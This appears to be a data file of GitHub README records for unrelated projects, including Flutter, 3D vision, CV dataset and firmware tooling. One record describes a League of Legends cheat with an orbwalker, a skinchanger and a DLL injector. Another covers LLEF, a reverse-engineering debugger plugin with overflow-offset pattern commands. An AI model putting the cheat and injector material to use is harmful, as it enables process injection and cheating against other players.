src="https://github.com/AllanCapistrano/AllanCapistrano/blob/master/assets/linkedin-brands.png" alt="Linkedin icon" width="5%"> </a> &nbsp <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&tf=1&source=mailto&[email protected]"> <img src="https://github.com/AllanCapistrano/AllanCapistrano/blob/master/assets/envelope-square-solid.png" alt="Email icon" width="5%"> </a> </p> ------------ ## :pray: Support ## **Please :star: this repository if this project is useful or has helped you.** [!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/allancapistrano) ------------ ## :balance_scale: License ## [GPL-3.0 License](./LICENSE)
25
1
worldline-spain/flutter_architecture_template
https://github.com/worldline-spain/flutter_architecture_template
null
# Flutter architecture template ## Introduction This project is a starting point for a Flutter applications created by Worldline Spain. ## Features - Clean Architecture - Flavors (dev, prep, prod) - Http client to Api REST ([Dio](https://pub.dev/packages/dio)) - Native launch screen - App icons configured - Internationalization translations ([Easy localization](https://pub.dev/packages/easy_localization)) - Routing ([Go Router](https://pub.dev/packages/go_router)) - MVVM pattern with [Cubit](https://pub.dev/packages/flutter_bloc) for state management - Dependency injection ([Get it](https://pub.dev/packages/get_it) and [Injectable](https://pub.dev/packages/injectable)). ## Environment The application has three environments and each one has its own configuration file: - dev: `.env/dev.dart` - prep: `.env/prep.dart` - prod: `.env/prod.dart` ## Configure new project To configure a new project, you have change the following files: 1. The environment files with the key and values. 2. Replace the project name `worldline_flutter` in all files. 3. Replace the package name `com.worldline.flutter` in all files. 4. Remove all files with references to Example code. 5. Refactor homeWorldline on `constants.dart` 6. Rename folder on `android/app/src/main/kotlin/` to your package name ### Generate native splash 1. Replace the splash image `assets/images/splash-logo.png` with the new one. 2. Replace the splash android 12 image `assets/images/splash-android12-logo.png` with the new one. 3. Generate the splash images with the following command `fvm flutter pub run flutter_native_splash:create` 4. (optional) If you want use splash images in Flutter, replace the `assets/images/splash.png` and related images to accomplish the [resolution aware asset](https://flutter.dev/docs/development/ui/assets-and-images#resolution-aware). In your `android/app/src/main/res/drawable-mdpi` folder, you will have a `splash.png`. This is your 1x image. [reference](https://developer.android.com/training/multiscreen/screendensities) Copy that to your app's assets folder. Then copy the `splash.png` in `android/app/src/main/res/drawable-hdpi` to a subfolder in your app's assets folder named `1.5x`. Do the same for the rest of the folders. The mapping should be: - `mdpi` → `assets` - `hdpi` → `assets/1.5x` - `xhdpi` → `assets/2.0x` - `xxhdpi` → `assets/3.0x` - `xxxhdpi` → `assets/4.0x` ## Run and build To run the application in each environment, you can use the following commands: - dev: `flutter run --flavor dev --dart-define-from-file=.env/dev.json` - prep: `flutter run --flavor prep --dart-define-from-file=.env/prep.json` - prod: `flutter run --flavor prod --dart-define-from-file=.env/prod.json` Also, you can configure your IDE to run the application in each environment. ## Generate code If you implement a new injectable file, you have to run the following command to generate the necessary code: `fvm flutter packages pub run build_runner build` or `sh ./tools/generate_code.sh` Also, you can configure Android Studio to run this command automatically: 1. On the configuration, add a new "External tool" execution step in the "before launch" section. 2. Configure the execution step as follows: 1. Name: injectable 2. Description: Run injects before launch 3. Program: flutter 4. Arguments: packages pub run build_runner build 5. Working directory: $ProjectFileDir$ Is important to note that you have to configure the command for the three flavors.
26
2
yinyunie/ScenePriors
https://github.com/yinyunie/ScenePriors
Implementation of CVPR'23: Learning 3D Scene Priors with 2D Supervision
# Learning 3D Scene Priors with 2D Supervision [[Project]](https://yinyunie.github.io/sceneprior-page/)[[Paper]](https://arxiv.org/pdf/2211.14157.pdf) [Yinyu Nie](https://yinyunie.github.io/), [Angela Dai](https://www.3dunderstanding.org/), [Xiaoguang Han](https://gaplab.cuhk.edu.cn/), [Matthias Nießner](https://niessnerlab.org/index.html) in [CVPR 2023](https://cvpr2023.thecvf.com/) --- **3D Scene Generation** | <img src="resources/scene_gen/rendering_1.jpg" width="500"> | <img src="resources/scene_gen/rendering_2.jpg" width="500"> |<img src="resources/scene_gen/rendering_3.jpg" width="500"> | <img src="resources/scene_gen/rendering_4.jpg" width="500"> | |:-----------------------------------------------------------:|:-----------------------------------------------------------:|:-----------------------------------------------------------:|:-----------------------------------------------------------:| **Single View Reconstruction** | Input | Pred | Input | Pred | |:-------------------------------------------------:|:---------------------------------------------------:|:-------------------------------------------------:|:------------------------------------------------:| | <img src="resources/svr/1/input.jpg" width="500"> | <img src="resources/svr/1/ours.jpg" width="500"> | <img src="resources/svr/2/input.jpg" width="500"> | <img src="resources/svr/2/ours.jpg" width="500"> | --- ## Install Our codebase is developed under Ubuntu 20.04 with PyTorch 1.12.1. 1. We recommend to use [conda]() to deploy our environment by ```commandline cd ScenePriors conda create env -f environment.yml conda activate sceneprior ``` 2. Install [Fast Transformers](https://fast-transformers.github.io/) by ```commandline cd external/fast_transformers python setup.py build_ext --inplace cd ../.. ``` 3. Please follow [link](https://github.com/facebookresearch/pytorch3d/blob/main/INSTALL.md) to install the prerequisite libraries for [PyTorch3D](https://pytorch3d.org/). Then install PyTorch3D from our local clone by ```commandline cd external/pytorch3d pip install -e . cd ../.. ``` *Note: After installed all prerequisite libraries in [link](https://github.com/facebookresearch/pytorch3d/blob/main/INSTALL.md), please do not install prebuilt binaries for PyTorch3D.* --- ## Data Processing ### 3D-Front data processing (for scene genration) 1. Apply \& Download the [3D-Front](https://tianchi.aliyun.com/specials/promotion/alibaba-3d-scene-dataset) dataset and link them to the local directory as follows: ``` datasets/3D-Front/3D-FRONT datasets/3D-Front/3D-FRONT-texture datasets/3D-Front/3D-FUTURE-model ``` 2. Render 3D-Front scenes following my [rendering pipeline](https://github.com/yinyunie/BlenderProc-3DFront) and link the rendering results (in `renderings` folder) to ``` datasets/3D-Front/3D-FRONT_renderings_improved_mat ``` *Note: you can comment out `bproc.renderer.enable_depth_output(activate_antialiasing=False)` in `render_dataset_improved_mat.py` since we do not need depth information.* 3. Preprocess 3D-Front data by ```commandline python utils/threed_front/1_process_viewdata.py --room_type ROOM_TYPE --n_processes NUM_THREADS python utils/threed_front/2_get_stats.py --room_type ROOM_TYPE ``` * The processed data for training are saved in `datasets/3D-Front/3D-FRONT_samples`. * We also parsed and extracted the 3D-Front data for visualization into `datasets/3D-Front/3D-FRONT_scenes`. * `ROOM_TYPE` can be `'bed'`(bedroom) or `'living'`(living room). * You can set `NUM_THREADS` to your CPU core number for parallel processing. 4. Visualize processed data for verification by (optional) ```commandline python utils/threed_front/vis/vis_gt_sample.py --scene_json SCENE_JSON_ID --room_id ROOM_ID --n_samples N_VIEWS ``` * `SCENE_JSON_ID` is the ID of a scene, e,g, `6a0e73bc-d0c4-4a38-bfb6-e083ce05ebe9`. * `ROOM_ID` is the room ID in this scene, e.g., `MasterBedroom-2679`. * `N_VIEWS` is the number views to visualize., e.g. `12`. If everything goes smooth, there will pop five visualization windows as follows. | <div style="width:200px">RGB</div> | <div style="width:200px">Semantics</div> | <div style="width:200px">Instances</div> | <div style="width:200px">3D Box Projections</div> | <div style="width:200px">CAD Models (view #1)</div> | |:---------------------------------------------------------------:|:---------------------------------------------------------------------------------:|:----------------------------------------------------------------:|:------------------------------------------------------------------------:|:----------------------------------------------------------------------:| | <img src="resources/visualization/front3d/rgb.jpg" width="300"> | <img src="resources/visualization/front3d/sem.jpg" width="300"> | <img src="resources/visualization/front3d/inst.jpg" width="300"> | <img src="resources/visualization/front3d/3dboxesproj.jpg" width="300"> | <img src="resources/visualization/front3d/CAD_models.png" width="300"> | *Note: X server is required for visualization.* ### ScanNet data processing (for single-view reconstruction) 1. Apply and download [ScanNet](http://www.scan-net.org/) into `datasets/ScanNet/scans`. Since we need 2D data, the `*.sens` should also be downloaded for each scene. 2. Extract `*.sens` files to obtain RGB/semantics/instance/camera pose frame data by ```commandline python utils/scannet/1_unzip_sens.py ``` Then the folder structure in each scene looks like: ``` ./scene* |--color (folder) |--instance-filt (folder) |--intrinsic (folder) |--label-filt (folder) |--pose (folder) |--scene*.aggregation.json |--scene*.sens |--scene*.txt |--scene*_2d-instance.zip ... |--scene*_vh_clean_2.ply ``` 3. Process ScanNet data by ```commandline python utils/scannet/2_process_viewdata.py ``` The processed data will be saved in `datasets/ScanNet/ScanNet_samples`. 4. Visualize the processed data by(optional) ```commandline python utils/scannet/vis/vis_gt.py --scene_id SCENE_ID --n_samples N_SAMPLES ``` * SCENE_ID is the scene ID in scannet, e.g., `scene0000_00` * N_SAMPLES is the number of views to visualize, e.g., `6` If everything goes smooth, it will pop out five visualization windows like | <div style="width:200px">RGB</div> | <div style="width:200px">Semantics</div> | <div style="width:200px">Instances</div> | <div style="width:200px">3D Box Projections</div> | <div style="width:200px">3D Boxes (view #3)</div> | |:---------------------------------------------------------------:|:---------------------------------------------------------------:|:----------------------------------------------------------------:|:-----------------------------------------------------------------------:|:-------------------------------------------------------------------:| | <img src="resources/visualization/scannet/rgb.jpg" width="300"> | <img src="resources/visualization/scannet/sem.jpg" width="300"> | <img src="resources/visualization/scannet/inst.jpg" width="300"> | <img src="resources/visualization/scannet/3dboxesproj.jpg" width="300"> | <img src="resources/visualization/scannet/3dboxes.png" width="300"> | *Note: X server is required for visualization.* --- ## Training *Note: we use SLURM to manage multi-GPU training. For backend setting, please check [slurm_jobs](slurm_jobs).* ### Scene Generation (with 3D-Front) Here we use bedroom data as an example. Training on living rooms is the same. 1. Start layout pretraining by ```commandline python main.py \ start_deform=False \ resume=False \ finetune=False \ weight=[] \ distributed.num_gpus=4 \ data.dataset=3D-Front \ data.split_type=bed \ data.n_views=20 \ data.aug=False \ device.num_workers=32 \ train.batch_size=128 \ train.epochs=800 \ train.freeze=[] \ scheduler.latent_input.milestones=[400] \ scheduler.generator.milestones=[400] \ log.if_wandb=True \ exp_name=pretrain_3dfront_bedroom ``` The network weight will be saved in `outputs/3D-Front/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. 2. Shape training - We start shape training after the layout training converged. Please replace the `weight` keyword below with the pretrained weight path. ```commandline python main.py \ start_deform=True \ resume=False \ finetune=True \ weight=['outputs/3D-Front/train/YEAR-MONTH-DAY/HOUR-MINITE-SECOND/model_best.pth'] \ distributed.num_gpus=4 \ data.dataset=3D-Front \ data.n_views=20 \ data.aug=False \ data.downsample_ratio=4 \ device.num_workers=16 \ train.batch_size=16 \ train.epochs=500 \ train.freeze=[] \ scheduler.latent_input.milestones=[300] \ scheduler.generator.milestones=[300] \ log.if_wandb=True \ exp_name=train_3dfront_bedroom ``` Still, the refined network weight will be saved in `outputs/3D-Front/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. ### Single-view Reconstruction (with ScanNet) 1. Start layout pretraining by ```commandline python main.py \ start_deform=False \ resume=False \ finetune=False \ weight=[] \ distributed.num_gpus=4 \ data.dataset=ScanNet \ data.split_type=all \ data.n_views=40 \ data.aug=True \ device.num_workers=32 \ train.batch_size=64 \ train.epochs=500 \ train.freeze=[] \ scheduler.latent_input.milestones=[500] \ scheduler.generator.milestones=[500] \ log.if_wandb=True \ exp_name=pretrain_scannet ``` The network weight will be saved in `outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. 2. Shape training - We start shape training after the layout training converged. Please replace the weight keyword below with the pretrained weight path. ```commandline python main.py \ start_deform=True \ resume=False \ finetune=True \ weight=['outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth'] \ distributed.num_gpus=4 \ data.dataset=ScanNet \ data.split_type=all \ data.n_views=40 \ data.downsample_ratio=4 \ data.aug=True \ device.num_workers=8 \ train.batch_size=8 \ train.epochs=500 \ train.freeze=[] \ scheduler.latent_input.milestones=[300] \ scheduler.generator.milestones=[300] \ log.if_wandb=True \ exp_name=train_scannet ``` Still, the refined network weight will be saved in `outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. --- ## Generation & Reconstruction Please replace the keyword `weight` below with your trained weight path. 1. Scene Generation (with 3D-Front) ```commandline python main.py \ mode=generation \ start_deform=True \ data.dataset=3D-Front \ finetune=True \ weight=outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth \ generation.room_type=bed \ data.split_dir=splits \ data.split_type=bed \ generation.phase=generation ``` The generated scenes will be saved in `outputs/3D-Front/generation/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND`. 2. Single view reconstruction (with ScanNet). Since this process involves test-time optimization, it would be very slow. Here we test in parallel by dividing the whole test set into `batch_num` batches. You should run this script multiple times to finish the whole testing, where for each script, you should set an individual `batch_id` number, `batch_id=0,1,...,batch_num-1`. If you not want to run in parallel, you can keep the default setting as below. ```commandline python main.py \ mode=demo \ start_deform=True \ finetune=True \ data.n_views=1 \ data.dataset=ScanNet \ data.split_type=all \ weight=outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth \ optimizer.method=RMSprop \ optimizer.lr=0.01 \ scheduler.latent_input.milestones=[1200] \ scheduler.latent_input.gamma=0.1 \ demo.epochs=2000 \ demo.batch_id=0 \ demo.batch_num=1 \ log.print_step=100 \ log.if_wandb=False \ ``` The results will be saved in `outputs/ScanNet/demo/output`. 3. Similarly, you can do single view reconstruction with 3D-Front as well. ```commandline python main.py \ mode=demo \ start_deform=True \ finetune=True \ data.n_views=1 \ data.dataset=3D-Front \ data.split_type=bed \ weight=outputs/3D-Front/train/2022-09-06/02-37-24/model_best.pth \ optimizer.method=RMSprop \ optimizer.lr=0.01 \ scheduler.latent_input.milestones=[1200] \ scheduler.latent_input.gamma=0.1 \ demo.epochs=2000 demo.batch_id=0 \ demo.batch_num=1 \ log.print_step=100 \ log.if_wandb=False ``` The results will be saved in `outputs/3D-Front/demo/output`. --- ## Visualization *Note: you may need X-server to showcase the visualization windows from [VTK](https://vtk.org/).* 1. Scene Generation (with 3D-Front). ```commandline python utils/threed_front/vis/render_pred.py --pred_file outputs/3D-Front/generation/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/vis/bed/sample_X_X.npz [--use_retrieval] ``` 2. Single-view Reconstruction (with ScanNet) ```commandline python utils/scannet/vis/vis_prediction_scannet.py --dump_dir demo/ScanNet/output --sample_name all_sceneXXXX_XX_XXXX ``` 3. Single-view Reconstruction (with 3D-Front) ```commandline python utils/threed_front/vis/vis_svr.py --dump_dir demo/3D-Front/output --sample_name [FILENAME IN dump_dir] ``` --- ## Citation If you find our work is helpful, please cite ``` @InProceedings{Nie_2023_CVPR, author = {Nie, Yinyu and Dai, Angela and Han, Xiaoguang and Nie{\ss}ner, Matthias}, title = {Learning 3D Scene Priors With 2D Supervision}, booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, month = {June}, year = {2023}, pages = {792-802} } ```
35
4
lancedb/yoloexplorer
https://github.com/lancedb/yoloexplorer
YOLOExplorer : Iterate on your YOLO / CV datasets using SQL, Vector semantic search, and more within seconds
# YOLOExplorer Explore, manipulate and iterate on Computer Vision datasets with precision using simple APIs. Supports SQL filters, vector similarity search, native interface with Pandas and more. * Analyse your datasets with powerful custom queries * Find and remove bad images (duplicates, out of domain data and more) * Enrich datasets by adding more examples from another datasets * And more 🌟 NEW: Supports GUI Dashboard, Pythonic and notebook workflows ### Dashboard Workflows <details open> <summary>Mutliple dataset support</summary> You can now explore multiple datasets, search across them, add/remove images across multiple datasets to enrich bad examples. Start training on new dataset within seconds. Here's an example of using VOC, coco128 and coco8 datasets together with VOC being the primary. <pre> from yoloexplorer import Explorer exp = Explorer("VOC.yaml") exp.build_embeddings() coco_exp = Explorer("coco128.yaml") coco_exp.build_embeddings() #Init coco8 similarly exp.dash([coco_exp, coco8]) #Automatic analysis coming soon with dash(..., analysis=True) </pre> ![ezgif com-optimize (3)](https://github.com/lancedb/yoloexplorer/assets/15766192/3422a536-138a-4fce-af2c-cef97f171aed) </details> <details open> <summary>Query using SQL and semantic search, View dataset as pandas DF and explore embeddings</summary> ![ezgif com-optimize (4)](https://github.com/lancedb/yoloexplorer/assets/15766192/b786e2f1-dc8e-411e-b13b-84b26ec50d41) ![ezgif com-optimize (5)](https://github.com/lancedb/yoloexplorer/assets/15766192/38d42a38-810e-48f3-89ea-1ccf304a1047) </details> <details open> Try an example colab <a href="https://colab.research.google.com/github/lancedb/yoloexplorer/blob/main/examples/intro.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <summary>Colab / Notebook</summary> <img src="./yoloexplorer/assets/docs/intro.gif" height=75% width=75% /> </details> ### Installation ``` pip install git+https://github.com/lancedb/yoloexplorer.git ``` Pypi installation coming soon ## Quickstart YOLOExplorer can be used to rapidly generate new versions of CV datasets trainable on [Ultralytics YOLO, SAM, FAST-SAM, RT-DETR](https://github.com/ultralytics/ultralytics) and more models. Start exploring your Datasets in 2 simple steps * Select a supported dataset or bring your own. Supports all Ultralytics YOLO datasets currently ```python from yoloexplorer import Explorer coco_exp = Explorer("coco128.yaml") ``` * Build the LanceDB table to allow querying ```python coco_exp.build_embeddings() coco_exp.dash() # Launch the GUI dashboard ``` <details open> <summary> <b> Querying Basics </b> </summary> You can get the schema of you dataset once the table is built ``` schema = coco_exp.table.schema ``` You can use this schema to run queries <b>SQL query</b><br/> Let's try this query and print 4 result - Select instances that contain one or more 'person' and 'cat' ```python df = coco_exp.sql("SELECT * from 'table' WHERE labels like '%person%' and labels LIKE '%cat%'") coco_exp.plot_imgs(ids=df["id"][0:4].to_list()) ``` Result <img src="./yoloexplorer/assets/docs/plotting.png" height=50% width=50% /><br/> The above is equivlant to plotting directly with a query: ```python voc_exp.plot_imgs(query=query, n=4) ``` <b>Querying by similarity</b><br/> Now lets say your model confuses between cetain classes( cat & dog for example) so you want to look find images similar to the ones above to investigate. The id of the first image in this case was 117 ```python imgs, ids = coco_exp.get_similar_imgs(117, n=6) # accepts ids/idx, Path, or img blob voc_exp.plot_imgs(ids) ``` <img src="./yoloexplorer/assets/docs/sim_plotting.png" height=50% width=50% /><br/> The above is equivlant to directly calling `plot_similar_imgs` ```python voc_exp.plot_similar_imgs(117, n=6) ``` NOTE: You can also pass any image file for similarity search, even the ones that are not in the dataset <b>Similarity Search with SQL Filter (Coming Soon)</b></br> Soon you'll be able to have a finer control over the queries by pre-filtering your table ``` coco_exp.get_similar_imgs(..., query="WHERE labels LIKE '%motorbike%'") coco_exp.plot_similar_imgs(query="WHERE labels LIKE '%motorbike%'") ``` </details> <details> <summary> <b>Plotting</b></summary> | Visualization Method | Description | Arguments | |---|---|---| | `plot_imgs(ids, query, n=10)` | Plots the given `ids` or the result of the SQL query. One of the 2 must be provided. | `ids`: A list of image IDs or a SQL query. `n`: The number of images to plot. | | `plot_similar_imgs(img/idx, n=10)` | Plots `n` top similar images to the given img. Accepts img idx from the dataset, Path to imgs or encoded/binary img | `img/idx`: The image to plot similar images for. `n`: The number of similar images to plot. | | `plot_similarity_index(top_k=0.01, sim_thres=0.90, reduce=False, sorted=False)` | Plots the similarity index of the dataset. This gives measure of how similar an img is when compared to all the imgs of the dataset. | `top_k`: The percentage of images to keep for the similarity index. `sim_thres`: The similarity threshold. `reduce`: Whether to reduce the dimensionality of the similarity index. `sorted`: Whether to sort the similarity index. | **Additional Details** * The `plot_imgs` method can be used to visualize a subset of images from the dataset. The `ids` argument can be a list of image IDs, or a SQL query that returns a list of image IDs. The `n` argument specifies the number of images to plot. * The `plot_similar_imgs` method can be used to visualize the top `n` similar images to a given image. The `img/idx` argument can be the index of the image in the dataset, the path to the image file, or the encoded/binary representation of the image. * The `plot_similarity_index` method can be used to visualize the similarity index of the dataset. The similarity index is a measure of how similar each image is to all the other images in the dataset. The `top_k` argument specifies the percentage of images to keep for the similarity index. The `sim_thres` argument specifies the similarity threshold. The `reduce` argument specifies whether to reduce the dimensionality of embeddings before calculating the index. The `sorted` argument specifies whether to sort the similarity index. </details> <details> <summary> <b>Add, remove, merge parts of datasets, persist new Datasets, and start training!</b></summary> Once you've found the right images that you'd like to add or remove, you can simply add/remove them from your dataset and generate the updated version. <b>Removing data</b><br/> You can simply remove images by passing a list of `ids` from the table. ``` coco_exp.remove_imgs([100,120,300..n]) # Removes images at the given ids. ``` <b>Adding data</b><br/> For adding data from another dataset, you need an explorer object of that dataset with embeddings built. You can then pass that object along with the ids of the imgs that you'd like to add from that dataset. ``` coco_exp.add_imgs(exp, idxs) # ``` Note: You can use SQL querying and/or similarity searches to get the desired ids from the datasets. <b>Persisting the Table: Create new dataset and start training</b><br/> After making the desired changes, you can persist the table to create the new dataset. ``` coco_exp.persist() ``` This creates a new dataset and outputs the training command that you can simply paste in your terminal to train a new model! <b>Resetting the Table</b><br/> You can reset the table to its original or last persisted state (whichever is latest) ``` coco_exp.reset() ``` </details> <details> <summary><b>(Advanced querying)Getting insights from Similarity index</b></summary> The `plot_similarity_index` method can be used to visualize the similarity index of the dataset. The similarity index is a measure of how similar each image is to all the other images in the dataset. Let's the the similarity index of the VOC dataset keeping all the default settings ```python voc_exp.plot_similarity_index() ``` <img src="./yoloexplorer/assets/docs/sim_index.png" height=50% width=50%><br/> You can also get the the similarity index as a numpy array to perform advanced querys. ```python sim = voc_exp.get_similarity_index() ``` Now you can combine the similarity index with other querying options discussed above to create even more powerful queries. Here's an example: "Let's say you've created a list of candidates you wish to remove from the dataset. Now, you want to filter out the images that have similarity index less than 250, i.e, remove the images that are 90%(`sim_thres`) or more similar to more than 250 images in the dataset. " ```python ids = [...] # filtered ids list filter = np.where(sim > 250) final_ids = np.intersect1d(ids, filter) # intersect both arrays exp.remove_imgs(final_ids) ``` </details> <h3>Coming Soon</h3> <b>Pre-filtering</b> * To allow adding filter to searches. * Have a finer control over embeddings search space Pre-filtering will enable powerful queries like - "Show me images similar to <IMAGE> and include only ones that contain one or more(or exactly one) person, 2 cars and 1 horse" <br/> * <b>Automatically find potential duplicate images</b> * <b>Better embedding plotting and analytics insights </b> * <b>Better dashboard for visualizing imgs </b> </br> Notes: * The API will have some minor changes going from dev to minor release * For all practical purposes the ids are same as row number and is reset after every addition or removal
61
10
azriel91/dot_ix
https://github.com/azriel91/dot_ix
Interactive dot graphs
# ✒️ dot_ix > 🚧 This is very much a work in progress [Try it yourself](https://azriel.im/dot_ix/) *(sorry not mobile friendly)* https://user-images.githubusercontent.com/2993230/253878816-0729970f-651f-45ef-a986-470f383b8018.mp4 ```bash cargo install cargo-leptos # Then, one of: # * server side rendering cargo leptos watch --bin-features "ssr" -v # * client side rendering trunk serve ``` ## To Do > 🦜 Feel free to do any of these -- this project isn't my main focus, but I should be responsive in reviewing / merging things. * [ ] Instead of building using `cargo leptos` in `pages`, use `trunk`. This means not having a `styles/main.scss` -- cargo leptos merges styles with tailwind, that's why we use `cargo leptos`. See `Trunk.toml` if we were to use `trunk` and tailwind on its own. * [ ] Change `rt/into_graphviz_dot_src/info_graph.rs` to write to a buffer, instead of individual strings. * [ ] Take each node with a "type". * [ ] Take in tailwindcss classes to attach to node types. * [ ] Take in theme / merge with default theme. * [ ] Split `dot_ix` library from the web app, so it can be embedded in other apps. * [ ] GitHub Actions / automated testing / releasing / publishing. * [ ] Playground: Render pre-written graphs - Local storage - Graph in URL - Link to gist * [ ] Mobile friendly web page.
61
1
matkhl/leagueoflegends
https://github.com/matkhl/leagueoflegends
null
## leagueoflegends Simple source including: - recall tracker (outdated) - cooldown tracker (outdated) - orbwalker - champion modules - simple prediction & targetselection - skinchanger (based on R3nzSkin source) *Updated for patch 13.14.522 (minipatch after 13.14 release)* ### How to use the Injector In order for the injector to work, you need to put two compiled [Guided Hacking injector library](https://github.com/Broihon/GH-Injector-Library) files inside the output directory. ![Files screenshot](https://i.imgur.com/zVhDSCd.png) ### Default hotkeys - Open menu - Shift - Attack - Space - Uninject - Esc
15
7
tidbyt/hdk
https://github.com/tidbyt/hdk
A community supported firmware for the Tidbyt hardware 🤓
# Hardware SDK [![Docs](https://img.shields.io/badge/docs-tidbyt.dev-blue?style=flat-square)](https://tidbyt.dev) [![Build Status](https://img.shields.io/github/actions/workflow/status/tidbyt/hdk/main.yaml?style=flat-square)](https://github.com/tidbyt/hdk/actions/workflows/main.yaml) [![Discourse](https://img.shields.io/discourse/status?server=https%3A%2F%2Fdiscuss.tidbyt.com&style=flat-square)](https://discuss.tidbyt.com/) [![Discord Server](https://img.shields.io/discord/928484660785336380?style=flat-square)](https://discord.gg/r45MXG4kZc) This repository contains a community supported firmware for the Tidbyt hardware 🤓. ![social banner](./docs/assets/social.png) ## Warning ⚠️ Warning! Flashing your Tidbyt with this firmware or derivatives could fatally damage your device. As such, flashing your Tidbyt with this firmware or derivatives voids your warranty and comes without support. ## Setup This project uses PlatformIO to build, flash, and monitor firmware on the Tidbyt. To get started, you will need to download [PlatformIO Core][2] on your computer. Additionally, this firmware is designed to work with [Pixlet][1]. Using `pixlet serve`, you can serve a WebP on your local network. Take note of your computers IP address and replace it in the `TIDBYT_REMOTE_URL` example above. While we had pixlet in mind, you can point this firmware at any URL that hosts a WebP image that is optimized for the Tidbyt display. ## Getting Started To flash the custom firmware on your device, run the following after replacing the variables with your desired information: ``` TIDBYT_WIFI_SSID='Your WiFi' \ TIDBYT_WIFI_PASSWORD='super-secret' \ TIDBYT_REMOTE_URL='http://192.168.10.10:8080/api/v1/preview.webp' \ pio run --environment tidbyt --target upload ``` ## Monitoring Logs To check the output of your running firmware, run the following: ``` pio device monitor ``` ## Back to Normal To get your Tidbyt back to normal, you can run the following to flash the production firmware onto your Tidbyt: ``` pio run --target reset ``` [1]: https://github.com/tidbyt/pixlet [2]: https://docs.platformio.org/en/latest/core/installation/index.html
20
3
foundryzero/llef
https://github.com/foundryzero/llef
LLEF is a plugin for LLDB to make it more useful for RE and VR
<p align="center"> <img src="assets/llef-dragon-small.png" alt="llef logo"/> </p> # LLEF LLEF (pronounced ɬɛf - "hlyeff") is an LLDB plugin to make it more usable for low-level RE and VR. Similar to [GEF](https://github.com/hugsy/gef), but for LLDB. It uses LLDB's Python API to add extra status output and a few new commands, so that security researchers can more easily use LLDB to analyse software as it's running. ![llef demo](https://foundryzero.co.uk/assets/img/llef-small.gif) ## 💻 Supported Architectures * x86_64 * aarch64 / arm64 ## 📓 Requirements * LLDB 15+ (https://apt.llvm.org/) _On macOS this is bundled with Xcode 14.3+_ ## ⚙ Installation The instructions below will install LLEF so that it is used by LLDB by default. 1. Clone the repository. 2. `cd <repo>` 3. Run `./install.sh` 4. Select automatic (overwrites `~/.lldbinit`) or manual installation. _LLDB uses AT&T disassembly syntax for x86 binaries by default. The installer provides an option to override this._ ## ▶ Usage ### Launch LLDB ```bash lldb-15 <optional binary to debug> ``` ### Use commands: #### Pattern Create ``` (lldb) pattern create 10 [+] Generating a pattern of 10 bytes (n=4) aaaabaaaca [+] Pattern saved in variable: $8 (lldb) pattern create 100 -n 2 [+] Generating a pattern of 100 bytes (n=2) aabacadaea [+] Pattern saved in variable: $9 ``` #### Pattern Search ``` (lldb) pattern search $rdx [+] Found in $10 at index 45 (big endian) (lldb) pattern search $8 [+] Found in $10 at index 0 (little endian) (lldb) pattern search aaaabaaac [+] Found in $8 at index 0 (little endian) (lldb) pattern search 0x61616161626161616361 [+] Found in $8 at index 0 (little endian) ``` ### Breakpoint hook This is automatic and prints all the currently implemented information at a break point. ## 👷‍♂️ Troubleshooting LLDB Python support LLDB comes bundled with python modules that are required for LLEF to run. If on launching LLDB with LLEF you encounter `ModuleNotFoundError` messages it is likely you will need to manually add the LLDB python modules on your python path. To do this run the following to establish your site-packages location: ```bash python3 -m site --user-site ``` Then locate the LLDB python modules location. This is typically at a location such as `/usr/lib/llvm-15/lib/python3.10/dist-packages` but depends on your python version. Finally, modify and execute the following to add the above LLDB module path into a new file `lldb.pth` in the site-packages location discovered above. ```bash echo "/usr/lib/llvm-15/lib/python3.10/dist-packages" > ~/.local/lib/python3.10/site-packages/lldb.pth ``` ## 👏 Thanks We’re obviously standing on the shoulders of giants here - we’d like to credit [hugsy](https://twitter.com/_hugsy_) for [GEF](https://github.com/hugsy/gef) in particular, from which this tool draws *heavy* inspiration! Please consider this imitation as flattery 🙂 If you'd like to read a bit more about LLEF you could visit our [launch blog post](https://foundryzero.co.uk/2023/07/13/llef.html).
197
4
mazpie/mastering-urlb
https://github.com/mazpie/mastering-urlb
[ICML 2023] Pre-train world model-based agents with different unsupervised strategies, fine-tune the agent's components selectively, and use planning (Dyna-MPC) during fine-tuning.
# Mastering the Unsupervised Reinforcement Learning Benchmark from Pixels [[website](https://masteringurlb.github.io/)] [[paper](https://arxiv.org/abs/2209.12016)] This is the code for our ICML 2023 work. You can use it to pre-train world model-based agents with different unsupervised strategies, fine-tune the agent's components selectively, and use planning (Dyna-MPC) during fine-tuning. The repo also contains an extensively tested DreamerV2 implementation in PyTorch. <p align="center"> <img src='assets/URLB_cover.png' width=75%> </p> If you find the code useful, please refer to our work using: ``` @inproceedings{ Rajeswar2023MasterURLB, title={Mastering the Unsupervised Reinforcement Learning Benchmark from Pixels}, author={Sai Rajeswar and Pietro Mazzaglia and Tim Verbelen and Alexandre Piché and Bart Dhoedt and Aaron Courville and Alexandre Lacoste}, booktitle={40th International Conference on Machine Learning}, year={2023}, url={https://arxiv.org/abs/2209.12016} } ``` ## Requirements The environment assumes you have access to a GPU that can run CUDA 10.2 and CUDNN 8. Then, the simplest way to install all required dependencies is to create an anaconda environment by running ```sh conda env create -f conda_env.yml ``` After the instalation ends you can activate your environment with ```sh conda activate urlb ``` ## Implemented Agents | Agent | Command |---|---| | DreamerV2 (supervised) | `agent=dreamer` | ICM | `agent=icm_dreamer` | Plan2Explore | `agent=plan2explore` | RND | `agent=rnd_dreamer` | LBS | `agent=lbs_dreamer` | APT | `agent=apt_dreamer` | DIAYN | 